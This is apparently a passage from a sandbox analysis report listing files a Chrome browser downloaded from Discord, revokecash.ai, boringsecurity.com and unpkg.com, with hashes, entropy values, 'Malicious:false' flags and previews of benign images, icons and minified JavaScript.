                                                                          SHA-512:481AD5DA97B74D0ABA0E4EA6E1EED24C9A2A9851866A4DFEED16C45856FDC170E25BA4DBCC95BFCEFC2E21DC0140A304F53919A5A57144CF91E00031557ABF87
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...0...0.....`.......PLTE;j.......:i.:f|:g} 7d{7gz:d|YTM..~"##;l.6cy.....z..pQLG(=G5e~....4/*_YQ=<9HD>0Ug,JY6^q..zlY..kJIE'/3<GK.}W..=U^....qQ..naN..kK).bS?2....}.xaQithkj..Q...S@)....kY.....tRNS.......```.!.<....pHYs................QIDATx..V...8.D..]I...........?mC..l.t.#.XYYY..Q...|..k..(.Ke`.(.n..*.x..'.......K.O.W...>.*7...!.....`...4`.t.h_....F:q..S}...c..F.o.*Ok...f.....D....F"U.T.....2.....m.......U.....c..@.A..7../I...o;-i....z.e....%..K(9...;..<...E#.?.Q..f..o.&...m>.O.5..d....~.Q.........TL.i......b..........x<..)?........4..U..(fod.Y...&P.U..z../....<...DK7..t).r...E)...(....].0..+J)....D?..C{.."U.N....fn;..e...O.S.Z.L..<f2....u.iiQ+g&..l.[<....]9....1!..e..;...k.oY..B~.F.S..O.j\.a....1s0.r.-.5... Kb...1r....R..c.+!.`R.|~....".`^b>5...>9v..FZM...ahf.l..s..%i..b9. 4...Yw....KZ..4.@"..$.vI..5..p.K...7..!..Y..`..m.B8...A.9.....a.... 9.(.J.dK.fjX.....l .p.....r. ...)I........@......WU(...B...._.....k. (..*....^.`..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):180
                                                                          Entropy (8bit):4.921485085907038
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WH7W+ZacvTnARcLnkDmJS4RKb5KVErcHYWNTWi7eLFOyTIXGUNfHFQJJqGrqL0:t6AbZ/Ikn4mc4slmYWBWzLRI2ylQJAe
                                                                          MD5:B1D4C5E276E3AAA8EC41E6014DD572B2
                                                                          SHA1:B5B63A8B35223277D75C79B2AABD8221FDA383EB
                                                                          SHA-256:7CF5996F7AB483BD985B3DE5BFBCF50A2B22A7B473E8011E5C993D9830AF9D12
                                                                          SHA-512:8E4C954D96FBDA407E87FA65859FE758FC83F2DA0C6D7C07824926BFB0BCDF4F40DE057C5DD1D7EE0890C5287D2ED2EC8FDEFBDF317B46FE222339894E0A559B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/1f3e315f020ed5635dc1.svg
                                                                          Preview:<svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):2128
                                                                          Entropy (8bit):7.834307897587494
                                                                          Encrypted:false
                                                                          SSDEEP:48:awrulyJN5YwGa0bktFsz/62RWnAPGNhZQGIcEOhO0URVW+b:7Yy359reS2kZhjbxsb
                                                                          MD5:655640D0240EDA849DFA66F653E739B7
                                                                          SHA1:1FFD89E2CCC04AD2BED9B4A1F1FD452A07ABD4DA
                                                                          SHA-256:E790EB301823DC91B8A64BFDBDB1ABCDD9004D6CF569CA417D68A2769683F08E
                                                                          SHA-512:8FD8A83DC46F9DEF90D51903530B36C767727D1D78C39EEEAE8DBB5880B9CE821BCFD439B073EA5FA7805C69B2FACF53C1C2E61E36924C6F4D97D9473B324566
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75"
                                                                          Preview:.PNG........IHDR...0...0.....`.......PLTE.@.?.?.<.?.?.@.9.9..?.?.:.>.?.5.~8n...~>O....g...XNeN\g....<.i5.9 L.....c_ny'M./.W..c.....g{.h....jmsI..b..\...w8.dC.@..q6.eF..."<.<.z..@KWoqs...Q<AEM'..v]..w~D.<.....U..T.1n.<.o5...^^T^avRbn...FR]/E.[q....Rgw01)......y.QP?.C....]......# ..x2_kb~hUq{v.:O#=6IWbt...u./...........OZ_8..lGf^6^mNG...wQz..yj.P...5L%K3....l...70?...TR0Z..k.....;.....mm....ou._H...T.w..`/.gS24...{.Q{.t..hpO*.S.IGV..&D)+_1...nakM]..4.``Ro..thbaiq?z..M\-...]1.E...m....xx{\GR$..q8g.S...h7D7.=..........|B.w?Y. j.".G).s@.X-n`.Kq#.Y<..Y.E .wSH).tW.ROv9$/y....w.!....yi.zLV.QD:HH!$.~.....$uqQ.UF.eP.__gx.......B....L.Q...jqwc...\\.sQ.M]W.J.Ms.f..e"V2.UX.:u.TMI...Zf.a.<...>...c,..D......X ...g>#.{.3M......sI.....M.tn.........z{n.45......|...m.L....:.N...P.<....tRNS.......e........pHYs.................IDATx...uT[K......H.8...)......wwwh.5....Z(uwww}......hI.....{.wwfg...MC .S...4...Lu=......c=...M9.Q.../......@ ..IuJ..x......I`*. .b...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):508
                                                                          Entropy (8bit):4.778600373408621
                                                                          Encrypted:false
                                                                          SSDEEP:12:tchNS3IICjqeqt1Ujf06FtLsRypIBkTHMRqcxtLiwcb6THb:tchNS3HCjeSFtRmGTYZtOwtT7
                                                                          MD5:75DDC5E71BFFAB303EA577158B738A73
                                                                          SHA1:5B3F2B0FA6C3010D1B78F5742BA408754091734E
                                                                          SHA-256:BAB1B534CFA39FF7ADB4FA1490441BCFDFE9A25DEC0A6B1E3CC0436692F17579
                                                                          SHA-512:218DC2F3D35611715C5F27E2E0D59409363D0818CC24BBD83E6E52A49D47EA2E59FAED318FC431EA18E2ED51ED023ABFB261AA43954ED64A150030270234F2EB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_img/en.svg
                                                                          Preview:<svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m0 0h512v512h-512z" fill="#012169"/><path d="m512 0v64l-190 192 190 187v69h-67l-191-188-186 188h-68v-68l186-187-186-183v-74h62l192 188 186-188z" fill="#fff"/><path d="m184 324 11 34-153 154h-42v-3zm124-12 54 8 150 147v45zm204-312-192 196-4-44 150-152zm-512 1 193 189-59-8-134-133z" fill="#c8102e"/><path d="m176 0v512h160v-512zm-176 176v160h512v-160z" fill="#fff"/><path d="m0 208v96h512v-96zm208-208v512h96v-512z" fill="#c8102e"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 640x214, components 3
                                                                          Category:dropped
                                                                          Size (bytes):19184
                                                                          Entropy (8bit):7.882628594538512
                                                                          Encrypted:false
                                                                          SSDEEP:384:hYNg77xIHwy4ZybGeym1rwEW1jhutKqozHPmdqe8wp:hYyow3ILym1r7QFMf4HPmz88
                                                                          MD5:103464CBECBA5AA0BD9F5D54395C0A9B
                                                                          SHA1:79D51EA1EAB9FD5ABE395B0EA39EBB405A3AB7E2
                                                                          SHA-256:A04137ED6BAE34F48762F8949143F13AF21F03A4536850F199D159E993FED628
                                                                          SHA-512:9F9F13540EB28DAF51692E52ACE02AB95034F07305F7BDE7D2EDA17695D614CF2ACFDF0ED974C82CDEB46F59B9105EB543A3CDDCF31B5FA779A03EDE18C6624B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 1000x1000, components 3
                                                                          Category:dropped
                                                                          Size (bytes):80543
                                                                          Entropy (8bit):7.952897950927098
                                                                          Encrypted:false
                                                                          SSDEEP:1536:9+jBLYVuntyKaMrJ9cKixBJZ4FYzpIc2/MT1cpXxAu3TXEXxNvQw7:OmoZl9cxH4OFIby6pXz3TUh2w7
                                                                          MD5:585B898383EF2E60BA4A7391F6C54310
                                                                          SHA1:19BC35A5B59D615AF01217C331A5F366F038EDDE
                                                                          SHA-256:CD76EA13D28236744ED0D415225B28B2A3AF9325AFA5B91F3D1BB1960C9BE50C
                                                                          SHA-512:D85278687F729E0733BA16FA2609BC8C4CFBB25451B3731D17B63737B6F200DEFFA9567E008E130C9454EA0E765B2743CB008D56FDB34E353753DFDE7E63DB6D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."........................................................................... ....X(..R.RT-.RX..(.B..."...@....,(.-.-%...........(....3A.S*..HB.P.......P.P....I-..@..Q.B.D-...PS4.%.@."......l."..T..).,...(....5.B[..T.P..@...".....`....".P..*R.:.(. .,.3.IBY@.".`..%..R.(.%.......,."."...PB..@X..............P......3C:.S4(. .....B..*"..,...........@.@.h@K.R..5....@...@......P..(.".R(.%RX(..,..P.B.....,,...dX,...-.h.`\....3PY.+.R.$.J..,.(..,.49.......EB.R......YBP..`.%....(.BP..X("....e.Y..,%.....,.4.P.Q,....#P.R...,.2.B.....(.U.,*R(..D..P...P.B.%.....@...8......,..l..D.j...RX.*h..,..5.H.*$.....B(.".I@."..P.(%...,R.e.\..(...Q/c.....s...}O...o3..~.....r..|.7.|.}...>_....\..c.?&.<.....aAPX...F6*.`XR..PT....IDP..A.4..J...@J,.(J.),....E...T.../_f...._....|6zZ..|.&...q`..Ki....E...}.>(t.>..._.y......2.X.K)e.m......%...... %.Al.a
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (9855)
                                                                          Category:downloaded
                                                                          Size (bytes):9910
                                                                          Entropy (8bit):5.614196563293672
                                                                          Encrypted:false
                                                                          SSDEEP:96:7csyBoXVZgXxyw9nIDy77ahp+50SalisVatKs1gE7u5YxPtSzhjE9gYj99kD1Zas:xyKXVZqAhc50fliMAz/8jE9kdI7RRNti
                                                                          MD5:F9B4070D706BD5263409D600ECAD1D3E
                                                                          SHA1:2E3EBEC4B614A0A68BF72E7E2AF11EFE9B4E8E78
                                                                          SHA-256:C5D43CAB59C7DCBA048DCB3450655F543C3E98DB8F6493CECD29CD47BD9D456D
                                                                          SHA-512:EC06FD10382463F70AD1D46BCAAA28B8CDB638196370DEFB4FCA1B63601F46753B8645AAAFF00AFB506ADB0174B8F6C22A58EA1442F376837143BC355BCB1252
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/64873.bd98aa3f1ec96684dac4.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["64873"],{753809:function(_,I,E){"use strict";E.r(I),E.d(I,{LinkIcon:function(){return R}});var T=E("37983");E("884691");var S=E("669491"),N=E("75196");let R=_=>{let{width:I=24,height:E=24,color:R=S.default.colors.INTERACTIVE_NORMAL,colorClass:A="",...O}=_;return(0,T.jsxs)("svg",{...(0,N.default)(O),xmlns:"http://www.w3.org/2000/svg",width:I,height:E,fill:"none",viewBox:"0 0 24 24",children:[(0,T.jsx)("path",{fill:"string"==typeof R?R:R.css,d:"M16.3 14.7a1 1 0 0 1 0-1.4l2.5-2.5a3.95 3.95 0 1 0-5.6-5.6l-2.5 2.5a1 1 0 1 1-1.4-1.4l2.5-2.5a5.95 5.95 0 1 1 8.4 8.4l-2.5 2.5a1 1 0 0 1-1.4 0ZM7.7 9.3a1 1 0 0 1 0 1.4l-2.5 2.5a3.95 3.95 0 0 0 5.6 5.6l2.5-2.5a1 1 0 1 1 1.4 1.4l-2.5 2.5a5.95 5.95 0 0 1-8.4-8.4l2.5-2.5a1 1 0 0 1 1.4 0Z",className:A}),(0,T.jsx)("path",{fill:"string"==typeof R?R:R.css,d:"M14.7 10.7a1 1 0 1 0-1.4-1.4l-4 4a1 1 0 0 0 1.4 1.4l4-4Z",className:A})]})}},769846:function(_,I,E){"use strict";E.r(I),E.d(I,{d
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):849684
                                                                          Entropy (8bit):5.5091843356805015
                                                                          Encrypted:false
                                                                          SSDEEP:24576:6p3TQ6/5YoQgVF7onR4VoF8c/SF6H9lULSwCIPNN:6pF/5YoQgVFz9LyI
                                                                          MD5:D9CECCA3378BDCF39FC0FE17D08FAA3C
                                                                          SHA1:9F7A29A0E15900631C0EA963DC05650AD77E4704
                                                                          SHA-256:6F94D0D3F37F6ECBFBCF9AAAE06926AEF0D3289F5BFA11E608897447CA85832D
                                                                          SHA-512:E8B571CA92C54BD0AF009BD45F63110D205754930EF43638C35BC7E2FB1E96B8F19DDFC1ADA8AA1E24FA105F3E71772F96C5A8C22C8E2BB83E551F3CCCCD4C91
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/69288.312b5f484a6756663ca9.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["69288"],{477850:function(e,t,n){e=n.nmd(e),n("781738"),(function(){var n=this,r=n.humanize,o={};void 0!==t?(void 0!==e&&e.exports&&(t=e.exports=o),t.humanize=o):("function"==typeof define&&define.amd&&define("humanize",function(){return o}),n.humanize=o),o.noConflict=function(){return n.humanize=r,this},o.pad=function(e,t,n,r){if(e+="",n?n.length>1&&(n=n.charAt(0)):n=" ","right"==(r=void 0===r?"left":"right"))for(;e.length<t;)e+=n;else for(;e.length<t;)e=n+e;return e},o.time=function(){return new Date().getTime()/1e3};var a=[0,0,31,59,90,120,151,181,212,243,273,304,334],i=[0,0,31,60,91,121,152,182,213,244,274,305,335];o.date=function(e,t){var n=void 0===t?new Date:new Date(t instanceof Date?t:1e3*t),r=/\\?([a-z])/gi,s=function(e,t){return u[e]?u[e]():t},c=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],l=["January","February","March","April","May","June","July","August","September","October
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (17615)
                                                                          Category:downloaded
                                                                          Size (bytes):17670
                                                                          Entropy (8bit):5.597884477473279
                                                                          Encrypted:false
                                                                          SSDEEP:384:LwRozOhn+uyI6NpsPHHHsglNpAAdTRIZWiv/XBuJlYo:0RJnjPPeXBuJ2o
                                                                          MD5:DD0045A215121572125A5304C3133A15
                                                                          SHA1:3EF4F53E521272322EAC0952CF5B9B7F7B01CEEE
                                                                          SHA-256:B491A88EE2A3533FC0C2EAA6A9F23A5E5D8E431A06AA9CF36E4C36FDCB0C699F
                                                                          SHA-512:3E469C09B5AAA2C665FE8D4D811C0A69CBE22F472BBF30C0D0C28E998E35B901785616EA2132BAED60FF8D1F56DD67FF9D95D43BFAF582634B4A3205497D5E1A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/68291.687557b9b660607399a3.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["68291"],{948773:function(t,e,r){"use strict";r("70102");var o=r("764789");function n(){}function i(){}i.resetWarningCache=n,t.exports=function(){function t(t,e,r,n,i,a){if(a!==o){var u=Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw u.name="Invariant Violation",u}}function e(){return t}t.isRequired=t;var r={array:t,bigint:t,bool:t,func:t,number:t,object:t,string:t,symbol:t,any:t,arrayOf:e,element:t,elementType:t,instanceOf:e,node:t,objectOf:e,oneOf:e,oneOfType:e,shape:e,exact:e,checkPropTypes:i,resetWarningCache:n};return r.PropTypes=r,r}},493110:function(t,e,r){t.exports=r("948773")()},764789:function(t,e,r){"use strict";t.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},728854:function(t,e,r){var o=r("157967");function n(t){this.mode=o.MODE_8BIT_BYTE,this.data=t}n.p
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):150
                                                                          Entropy (8bit):4.817012895739808
                                                                          Encrypted:false
                                                                          SSDEEP:3:PouV7uJzhquHbtt6vYk2ZRMRJfHKERSAEtvxLrXZiLKY8KDETqLLMu9MK6c4NGL:hxuJzhqIzyYk+qRU4zEdxXZiqiLMcMKj
                                                                          MD5:84241342D84AC29592A5D9516F8EDF7F
                                                                          SHA1:03C53980E18E17625F439C20E7D438F066202428
                                                                          SHA-256:6E21162BC64073FE9E3D3D6375CA24D04FED1912A5B7716AAC0CB0F2D16FAE7C
                                                                          SHA-512:7509483335C7A30365F7F403098491AC0B44FFFCC68A5CDACB86EC191F02DBDA5B16A20A09E924B6A29AC938578D43BACB9A50115DB5C5668EA27FE1811BD530
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/favicon.ico
                                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /favicon.ico</pre>.</body>.</html>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 256 x 256, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):27664
                                                                          Entropy (8bit):7.979909882312714
                                                                          Encrypted:false
                                                                          SSDEEP:768:k4Qs9xSh5BomTXqf66RUc4rU/BdPD6Ng/gG:k4Z0ZTaf1EYPD6c
                                                                          MD5:07E8B0A794E4312DB77AB3B8DFBA900F
                                                                          SHA1:03DA823740DBC22100D7FD9823E45A3094FDC79F
                                                                          SHA-256:E3F5F00AC7BDE5C247385FA9554A4A6DF6A95DC955391C92ECC394DB6D6A0F9F
                                                                          SHA-512:A4905FE10F05417FF4E05C615F857CB08C1E256025912E97CEB8BE4B1B9E218EAB1CC7C6AB8E719078D0D7DF5401132192132835FC861D8878F5D7735145EF48
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR.............k.XT....PLTELiq....*$73,...ihalmg/+,KIBQLHONG...,)"..."$#...$&$ "!.!.&('...)*((+,\bf,..CFF...EJL8<>...<@AJNPMRVbgkX]a|.....RX\...u{~/24jno...quv...=CG489......TVU.........fp{bb_.........y..T`n.........Xd....tRNS..v.p...X2.....C.....pHYs............... .IDATx.....8.5.....h._.K"A. .R"EJ.T%.....'.*.........~q..j... .y..../....................._..~.`.......q\...~6..~..&3.a...'......K....?..?.o..v0oo...f.c....Mooog3...>...i..~...o..}...E...\.J.j.*M/R."M.T.M%.mkn.r..../.._/X...cz{3..j..I.*m..J..j.T.M.6.h...DS.U...fP..d.O..7.......d.w!.*m...........l.../....i..x.O./of.?}....:.|..~.?.?..4..'...W.._,...S.|U'lVY.MY.wq..............[+.K.i*.....iC....@....K..'Q../E..R\.0..;{........-D/R2...7U......K..,...B.E..(.BTeS..n..O..B.....?........_......T.Y.3.Ry3.....i..,.*...i..."...y3..i....Oa...O.....^...e.......D{P.G6US.......i....o.l>.....?..{%4.......O...X.P.......\..7.I.u8.F4.[.V...._...E..=......[..'..^......X.....i..FP.....(.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (52405)
                                                                          Category:downloaded
                                                                          Size (bytes):352153
                                                                          Entropy (8bit):5.695934390326222
                                                                          Encrypted:false
                                                                          SSDEEP:6144:HMHmd8KGtXHwl+Qp+bgNmBgUGQEyVtUYUcEs7Lv9nOlKjzi8wik:sHmd8KwwfYgoVGQaYUcECL1OlKjz5wik
                                                                          MD5:4A57EDFDD7B5A59383370B9ED39817EB
                                                                          SHA1:11E303DCE45FBD85F5435EAE087DC54ED5234062
                                                                          SHA-256:CAD9C8E0137D1376B4E215083F55D0AD0CD0EF3DA564F6B375F9194D334E9905
                                                                          SHA-512:0961AF4E007E9540E60F5767AE2D371A2CC1AB01E489ECBD8EE52BE2214FBCD7387FD33541A96C04ED8DF4DC5E8AA6C374A317CDEF81FDC7E497007C0A16B4BC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/bundle-b2289479.js
                                                                          Preview:var Qy=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function Ku(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function ho(e){if(e.__esModule)return e;var t=e.default;if(typeof t=="function"){var n=function r(){return this instanceof r?Reflect.construct(t,arguments,this.constructor):t.apply(this,arguments)};n.prototype=t.prototype}else n={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.keys(e).forEach(function(r){var s=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(n,r,s.get?s:{enumerable:!0,get:function(){return e[r]}})}),n}var fo={exports:{}};(function(e){var t=Object.prototype.hasOwnProperty,n="~";function r(){}Object.create&&(r.prototype=Object.create(null),new r().__proto__||(n=!1));function s(c,d,l){this.fn=c,this.context=d,this.once=l||!1}function a(c,d,l,h,p){if(typeof l!="function")throw new TypeError("The listener must be a function");var f=new
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):13475
                                                                          Entropy (8bit):7.9581003729969115
                                                                          Encrypted:false
                                                                          SSDEEP:384:r+4jOLjbxDX8d9gUJPt4dtyNtROcrx5Cj:q4jQbxDsdvPtemi
                                                                          MD5:91556C4BEE7F8EFAD523EC7B99EBCABC
                                                                          SHA1:F44FE2E9A9D6BBA255495F1DBD925EEBADCFEA28
                                                                          SHA-256:FEAE54E6C738A566D3E00AEC80056414A92397D6436AA75F1E36166B8B7C381D
                                                                          SHA-512:40A5FD65C9A2CA8BDE5AC53D98865C40AF2B50E96F3945D614A440F722F57E58C090BFF216730A89FF25B63264DF4CEC6D3CAE03548E413AD9C6D6F16B650012
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_kupi_5990bb8872.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...|U...o..B.2.CHnn6...--...j.2...X+C.$.l..@...e%....D.:k.[..[..B.*K.W.{?..s.9'g<g.}...y..qr.7.......9....".~I..;...4/...rmGj.L..Z .BA)~.@."..k(OG..|Z*...B.d........k.+...s,;......5._....k.gA....bJ....AS.6W..49hf.-h..+../....*.0.k@g..E.A....4........[.........X.M...|..-../..<.u..t..8~.Ryas.j&.qA.l...c..x:......N....)l.!..@.&\.......\..x.B.5....6....hn......<'n."t..g.6...,..B..Cr.e..B......+/&L....gs3.:.."d..(!..I. ,....x-....y\.....h. k9..A...........[J.`...S...IN.,...NU...WO.....A.,.\..N..x.s.v.B.{N.q.6.|..6..i...B..e9.......v..].8'.f.6G...f6.s..7 ,..z..A%......<..f..Y.....*...........q.uv...Fyas.>.As.Xi.i...y...f... A.q.6'!............H.5..\."xVBl..k...0..l<...d<`......l.@.....]..\.N.....g3.B9].1h..v...)Kv e..J.J....Z......)|\.9p;y^..t*....R...l<......Qt^y.]V.Gg......:.C+.u\y..U...1.J5...O....v...^uB..V..6lV]..4!..$..)..Q.1k.D..`.9..0+{..d..1cP.F.*......1|Na.:1.......B.3
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (9979)
                                                                          Category:downloaded
                                                                          Size (bytes):10034
                                                                          Entropy (8bit):5.403729734334019
                                                                          Encrypted:false
                                                                          SSDEEP:192:U8kYBd9XSaLogrpkI9tz7XCD50cJ8hIU48s2FrWIAuOxWRl1JfDJK:3kYz9CaL3lvvglGBcxWP1V4
                                                                          MD5:38D4AC71291EC9223AE33B9EBB5A4E89
                                                                          SHA1:7282B3FB164396D9510224B3040A89902C825546
                                                                          SHA-256:9A8D5847B100E711A41231D5C45682B01B8173438F96C52667FD872976C18CC9
                                                                          SHA-512:3116E86E00BEC9585B7A2D604BBFCE0212584081487F18A1B49B055E4665C64A3ACA6C4A4B6D175A1E8D6A7237D57B744C4EBFB859A80B9DCF401C7A1F882E4F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/94288.dbd73ecb6b1482a870b7.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["94288"],{474172:function(t,r,n){"use strict";var e=n("696397").charAt;t.exports=function(t,r,n){return r+(n?e(t,r).length:1)}},681802:function(t,r,n){"use strict";var e=n("53786"),i=n("125359"),u=n("745795"),o=n("174669")("toStringTag"),c=Object,a="Arguments"===u(function(){return arguments}()),s=function(t,r){try{return t[r]}catch(t){}};t.exports=e?u:function(t){var r,n,e;return void 0===t?"Undefined":null===t?"Null":"string"==typeof(n=s(r=c(t),o))?n:a?u(r):"Object"===(e=u(r))&&i(r.callee)?"Arguments":e}},350142:function(t,r,n){"use strict";var e=n("64980"),i=Error,u=e("".replace),o=String(i("zxcasd").stack),c=/\n\s*at [^:]*:[^\n]*/,a=c.test(o);t.exports=function(t,r){if(a&&"string"==typeof t&&!i.prepareStackTrace)for(;r--;)t=u(t,c,"");return t}},571503:function(t,r,n){"use strict";var e=n("366483"),i=n("350142"),u=n("19125"),o=Error.captureStackTrace;t.exports=function(t,r,n,c){u&&(o?o(t,r):e(t,"stack",i(n,c)))}}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (14887)
                                                                          Category:downloaded
                                                                          Size (bytes):14942
                                                                          Entropy (8bit):5.690282084267149
                                                                          Encrypted:false
                                                                          SSDEEP:384:Wh54EyamtnOoOLkUl+Q4J39sz/crHPnoiTLpWXPMZU3X:WhMam7q/cw3X
                                                                          MD5:EFA64BF325B069F9CDDD3A1E224E7679
                                                                          SHA1:C18D2104D2AB6CF8599C57FC52D01FAF8C48AEC9
                                                                          SHA-256:94139CD642069DE9BA7621638C1DD08FF2703C859F69DF7E24EE109F4F3CD250
                                                                          SHA-512:6122B0ADD05CEB28E00CA0D12E74BDD9C39FC03BD7DDF7753A764D2B2EF8FCAA6149C3B361A524FC4462AFBDD979D06A965A197F7379F4E5B2BE9844D5BE5E2C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/86480.ebf8826a7f33e22a6aba.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["86480"],{668973:function(e,t,i){"use strict";e.exports=i.p+"18517b33da6ed36b855b.svg"},124036:function(e,t,i){"use strict";e.exports=i.p+"2304725db3c96705e901.svg"},721569:function(e,t,i){"use strict";e.exports=i.p+"b21a7b48a6e973958489.svg"},644286:function(e,t,i){"use strict";e.exports=i.p+"5ff8ffaa3831478d2a28.svg"},597346:function(e,t,i){"use strict";e.exports=i.p+"4ba6811c2bcb626963c6.svg"},380499:function(e,t,i){"use strict";e.exports=i.p+"20c942338703af7dccd1.svg"},50617:function(e,t,i){"use strict";e.exports=i.p+"d18655651bd838408129.svg"},972094:function(e,t,i){"use strict";e.exports=i.p+"5f5e1a58ecf11d0d8d15.svg"},92729:function(e,t,i){"use strict";e.exports=i.p+"f5710b460ce933c9abe8.svg"},335e3:function(e,t,i){"use strict";e.exports=i.p+"f5c7b6adf73fe335fa05.svg"},302872:function(e,t,i){"use strict";e.exports=i.p+"4fd94b2e62b94b0454d3.svg"},425914:function(e,t,i){"use strict";e.exports=i.p+"5b74fc90eac76
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (14838)
                                                                          Category:downloaded
                                                                          Size (bytes):14893
                                                                          Entropy (8bit):5.521744748677703
                                                                          Encrypted:false
                                                                          SSDEEP:192:eS5Bg+jv7LfPaNtzyAsZ8shEQ8Rl2Ub+ohykWyhWndZV1liA+x:F5B1LfCNtmAsbEQ8RgUSsvbWnP4A+x
                                                                          MD5:33D0E28A5B7EBD917D74F9C43320BC24
                                                                          SHA1:9E873718FAEEC4929D2A7F26B484FD3986BDCA13
                                                                          SHA-256:E636FDA65163669B34FB3AC56AECF3AA918C3CBD2769E412221CFC960120F910
                                                                          SHA-512:C2D4059AD579CE9973005E9E3983725A758F8AC42CBD8887C82F7B7FC4E0434BB78B9EB3995B05320F31B02A65F8B1CB730BA92EAF8F996B3C5195FD988A92F5
                                                                          Malicious:false
